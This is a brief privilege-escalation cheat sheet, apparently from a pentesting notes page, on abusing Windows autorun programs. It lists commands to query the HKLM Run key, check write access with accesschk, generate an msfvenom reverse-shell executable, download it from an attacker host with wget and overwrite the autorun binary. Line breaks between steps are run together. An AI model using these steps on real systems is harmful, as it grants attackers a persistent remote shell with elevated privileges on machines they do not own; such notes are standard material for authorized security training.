Autoruns
1) Check which programs are executed under this specific registry key
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run2) Check for access permissions on the program that is running inside the autorun registry
.\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"3) If you can overwrite the binary, then
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f exe -o program.exewget http://<Attacker-IP>/program.exemove .\program.exe "C:\Program Files\Autorun Program\" /YLast updated